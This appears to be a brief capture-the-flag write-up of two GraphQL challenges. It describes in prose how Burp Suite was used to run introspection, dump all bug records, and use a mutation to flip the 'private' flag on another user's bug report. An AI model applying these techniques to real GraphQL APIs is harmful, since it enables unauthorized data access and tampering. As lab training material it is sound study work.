Before all
The two challenges are both about GraphQL, and I just used the corresponding tools burp suite provide to solve them!
Reference(Port Swigger):https://portswigger.net/web-security/graphql
BugDB v1
introspection
Introspection is a step for schema information discovering.
Just type some stuffs and send it, meanwhile, right click on that history (in Burp Suite) and send it to responder.
In the request part, change to the GraphQL view and set an IntrospectionQuery.
Next, send it to sitemap, then feasible queries for the api are all in the target page!
Finally, I chose a query and send it to Repeater, removed all the variable params, and dumped all “allBugs” datas!
BugDB v2
introspection
Same as I done up there, but this time there’s a mutation function availible!
And also, if I directly use the query access “allBugs” just like the way I did before, there’s only an admin report but not the victim’s one.
mutation
Mutation is a process which is used for making changes to datas.
Furthermore, there’s a “private” paramter in the extracted data.
So, for solving this challengem, just change the “private” value for the Bug with id=2 into “true” through mutation!
P.S. Just remember that DONNOT change the text value LOL.